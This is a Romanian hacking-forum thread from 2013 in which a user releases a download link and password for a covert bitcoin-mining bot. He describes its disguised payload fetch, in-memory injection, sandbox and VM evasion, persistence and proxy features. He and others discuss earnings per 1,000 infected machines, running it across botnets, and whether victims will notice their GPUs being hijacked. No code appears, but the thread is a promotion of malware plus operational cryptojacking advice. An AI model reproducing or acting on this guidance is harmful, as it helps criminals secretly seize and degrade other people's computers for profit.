B3st Posted January 20, 2013 Report Posted January 20, 2013 (edited) Versiunea anterioaraCompatibilitate: windows xp, vista, 7, 8 pe x86 si x64.Marime server: 9 kb (compresat cu upx), server ul nu are dependinte (dll, framework, etc)m.jpg = ufasoft miner modificat de mine pentru a merge injectat, cryptat cu rc4.Miner ul descarca m.jpg, il decrypteaza si il injecteaza in memorie folosind parametri predefiniti, astfel server ul este total 'crypt-able'.+Anti sandboxie, vmware, anubis, virtualpc+Startup, melt, proxy.Facut in vb6, compilat cu linker ul de la vb2012 Note:1. In principiu 1k boti genereaza intre 700 si 1.4k $ pe luna.2. Fara rdp uri, au gpu praf.3. Fara tari precum pakistan, afghanistan s.a.m.d (au componente proaste)4. Proxy ul il folositi doar daca rulati server ul pe multe pc uri.5. Server ul are mutex, ca sa functioneze trebuie sa activati melt + startup.Muie cu ciuperci:http://www.youtube.com/watch?v=l3EcbK1jKTEUpdated: 01.25.2013Download: RST Miner v2.1.rarParola: rstforums.comNu il puneti pe alte forumuri(=! english), altfel presupun ca bitcoin o sa fie picat destul de repede.Link "permanent":https://rstforums.com/proiecte/RST_Miner_v2.1.rar Edited March 21, 2013 by Nytro 1 1 Quote
VladX Posted January 20, 2013 Report Posted January 20, 2013 Mersi..Dar daca tot l-ai facut public trebuia macar cryptat linkul dupa parerea mea.. Quote
sandabot Posted January 20, 2013 Report Posted January 20, 2013 (edited) Mersi..Dar daca tot l-ai facut public trebuia macar cryptat linkul dupa parerea mea..Subscriu Revin cu un review//dupa 1 zi l-am bagat in 5 persoane , nu s-a miscat deloc contu de la bitcoin.cz , am atata cat am si avut .Pe mine mi-e frica sa-l mai testez ca imi da freeze la PC Edited January 21, 2013 by sandabot Quote
cmihail Posted January 20, 2013 Report Posted January 20, 2013 aceeasi eroare o primesc si eu de pe windows 7. Quote
B3st Posted January 20, 2013 Author Report Posted January 20, 2013 (edited) Mda, se pare ca era de la mpress."Protejasem" clientu' cu mpress, iar asta crea eroarea aceea.Redownload, mersi lu' sandobot pentru report. Edited January 20, 2013 by B3st Quote
Gonzolfi Posted January 20, 2013 Report Posted January 20, 2013 Frumos tool. Dar iti recomand si eu sa criptezi macar parola, in base-64. Quote
djpliku Posted January 20, 2013 Report Posted January 20, 2013 Frumos, multumim pentru efortul depus:)EDIT: In PM cine-mi sugereaza niste pool-uri pentru botnet farm ? Quote
chill_toica Posted January 21, 2013 Report Posted January 21, 2013 Baieti , nu vreau sa va supar , sunt n00b , vreau doar sa imi explice si mie cineva pe limba prostilor cum configurez asta ,am cont pe bitcoin + worker facut . Quote
chill_toica Posted January 21, 2013 Report Posted January 21, 2013 Baieti , nu vreau sa va supar , sunt n00b , vreau doar sa imi explice si mie cineva pe limba prostilor cati bani face mineru asta cu aproximatie , care este datoriaa mea adica ce trebuie sa fac mai exact , nu vreau sa-mi dea cineva dea gata facut doar sa ma impinga sa o iau pe unde trebuie , si bitcoin astea cam cat e raportu bit - dolar? ,am cont pe bitcoin + worker facut + server-ul facut Quote
B3st Posted January 21, 2013 Author Report Posted January 21, 2013 (edited) @chill_toicaNote:1. In principiu 1k boti genereaza intre 700 si 1.4k $ pe luna.2. Fara rdp uri, au gpu praf.3. Fara tari precum pakistan, afghanistan s.a.m.d (au componente proaste)4. Proxy ul il folositi doar daca rulati server ul pe multe pc uri.Exchanger ul oficial pt bitcoin este: asta, vezi aici preturile Edited January 21, 2013 by B3st Quote
daatdraqq Posted January 22, 2013 Report Posted January 22, 2013 Unele pc-uri cu windows 7 ultimate (build 7600) x32 primesc eroarea asta :Serverul creaza 4 procese ,3 raman in "time wait" si unul se conecteaza . Quote
walker Posted January 23, 2013 Report Posted January 23, 2013 totosi cred ca ar trebui criptat linkul altfel o sa scada mult valoarea bitcoin Quote
B3st Posted January 23, 2013 Author Report Posted January 23, 2013 @daatdraqqPai nene, bin ul nu are nici un fel de mutex.Daca il deschizi de 15 ori se fute pc ul la lume rapid.Tre' sa fac un fel de mutex, nu am cum sa setez mutex in 'remote process' .. probabil prin shellcode s-ar putea face .. Quote
em Posted January 23, 2013 Report Posted January 23, 2013 Dar totusi de ce ai vrea sa rulezi de mai multe ori un proces care si asa iti ia 70% din CPU? Quote
B3st Posted January 23, 2013 Author Report Posted January 23, 2013 (edited) Pai sa ziceam ca ai un botnet si na, exe ul de la miner trebuie cryptat constant.Tu cand dai download & execute sa faci update.. se ruleaza miner ul din nou Edited January 23, 2013 by B3st 1 Quote
daatdraqq Posted January 24, 2013 Report Posted January 24, 2013 Daca nu-l trec prin proxy primesc mesajul asta in cont :Your miners are using deprecated 'Getwork' protocol. Please update your miners to the latest version with native support of modern 'Stratum' protocol.With update you'll also get: lower 'stale ratio', which means more accepted shares fees collected by the pool from network transactionsFollowing bitcoin miners have native Stratum support: GUI miner (20121118 and newer) for OpenCL cards (ATI) cgminer (2.8.x and newer) poclbm (20120920 and newer) bfgminerIf you still want to use another miner without built-in Stratum support (e.g. GUI miner for nVidia cards), please install Stratum proxy. This message disappear automatically once you update your miners and pool start new round. Crezi ca e vreo problema daca il las asa ? Vreau sa fac niste teste ,de aia am pus unul separat . Quote
Maximus Posted January 24, 2013 Report Posted January 24, 2013 (edited) Esti PIZDOS !!! Respectacum fara vrajeala, o intrebare, eu pot face rost de 1000 compuri (infectate) cu usurinta, pot da drumu la server pe toate cele 1000 de pc-uri ? sau trebuie sa fac cate un server pt fiecare (si la fiecare sa pun proxy diferit?)? Edited January 24, 2013 by Maximus 1 Quote
B3st Posted January 24, 2013 Author Report Posted January 24, 2013 (edited) @daatdraqqIn principiu n-ar fi vreo problema majora, doar ca protocolul Stratum foloseste ~10kb/minutPe cand Getwork(cel default, fara proxy) foloseste peste ~500kb/minut.@spide112Un singur server(cu acelasi proxy) merge rulat pe un numar infinit de pc uri .. LE: Gata, i-am pus si un fel de mutex.Functioneaza doar daca e activat startup + melt. Edited January 25, 2013 by B3st Quote
intrus Posted January 27, 2013 Report Posted January 27, 2013 Fucking interesting. Intrebare, nu s-o prinde vreun pinguin ca-i folosesti placa video 100% ? Quote
alinh0 Posted January 27, 2013 Report Posted January 27, 2013 Fucking interesting. Intrebare, nu s-o prinde vreun pinguin ca-i folosesti placa video 100% ? Si daca se prinde ce? Ca sa scoti bani din asta trebuie sa il rulezi pe cateva mii de pinguini. Quote
intrus Posted January 27, 2013 Report Posted January 27, 2013 In ideea ca daca nu stie, nu-si da format la PC. Dar cu placa video la 100%, pinguinu nu mai poate sa joace cs or whatever. Quote
B3st Posted January 27, 2013 Author Report Posted January 27, 2013 (edited) Nu poti sa setezi din miner cat la suta sa fie folosit GPU ul, (din cate stiu eu) toate minerele nu au optiunea asta.Logic vorbind, nici nu cred ca ai cum sa faci asta, miner ul da bruteforce la hash uri .. n-ai cum sa-i zici ca dea cu 40% din puterea unui GPU.La CPU am setat sa nu foloseasca toate nucle urile, asta bineinteles ca nu merge pe procesoare single-core.In alta ordine de idei, poti sa setezi la cate grade sa se opreasca minarea. (n-am implementat asta ca mi sa parut useless).LE: Acum este setat (by default) max temperature = 83 grade. Edited January 27, 2013 by B3st Quote
Maximus Posted February 1, 2013 Report Posted February 1, 2013 Jucaria asta e noua pentru mine, la "Bitcoin address:" ce pun / unde-mi fac cont ? Quote
B3st Posted February 1, 2013 Author Report Posted February 1, 2013 Jucaria asta e noua pentru mine, la "Bitcoin address:" ce pun / unde-mi fac cont ?Da' ai un mic demo aici, ce-ti trebuie mai mult ..https://www.youtube.com/watch?v=l3EcbK1jKTE Quote